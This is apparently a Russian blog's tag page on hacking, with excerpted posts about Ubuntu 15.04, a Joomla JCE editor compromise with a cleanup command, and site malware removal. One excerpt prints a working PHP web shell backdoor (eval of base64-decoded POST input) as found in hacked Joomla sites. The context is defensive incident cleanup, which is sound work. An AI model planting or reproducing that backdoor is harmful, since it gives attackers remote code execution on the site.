Не успела выйти новая версия Ubuntu 15.04 (Vivid Vervet), как уже на подходе обновление безопасности. Canonical решили оставаться в тренде и брать от мира открытого ПО самые сливки. В этой версии они решили таки отказаться от своей системы инициализации upstart и перейти на темную сторону на systemd. Естественно, пилить свое и своими силами всегда более…
Метка: взлом
Уязвимость Joomla с редактором JCE
В плагине редакторе JCE версии ниже 2.0.11 была обнаружена уязвимость и имеет место быть большая череда взломов с последующим внедрением вредоносного кода в js-файлы.Тот случай, который был виден мной, состоял из следующего кода:document.write(”);Можно попробовать выполнить следующую команду в корне директории сайта, однако она несколько грубоватаяfind ./ -type f -name “*.js” -exec perl -pi -e ‘s/docume.*\)\;//g”’…
Вирусы на сайте. Поиск и удаление кода.
Тема появления вредоносного кода на страницах сайта очень популярная. Хотел в заголовке добавить “Часть 1”, но потом решил сделать в виде бесконечной истории =) Как уже все должно быть известно, нередко (я бы даже сказал, в большинстве случаев) пользователи сами становятся носителями инфекции (в ботнет-среде таких называют “зомби”). И внедрение кода может происходить следующим способом.…
Взлом Joomla, внедрение бекдора и очистка от кода
UPD 01.03.2013: Я закрыл возможность комментирования данной записи. Все вопросы по данной теме задавайте на https://ask.sabini.ch. Благодарю за понимание. В конце 2011 года в Joomla была некая уязвимость, которая позволила злоумышленникам положить в директорию images бекдор – файл post.php, следующего содержания <?php eval(base64_decode($_POST[“php”])); ?> После чего основная масса файлов с расширением php (причем, заражалось все…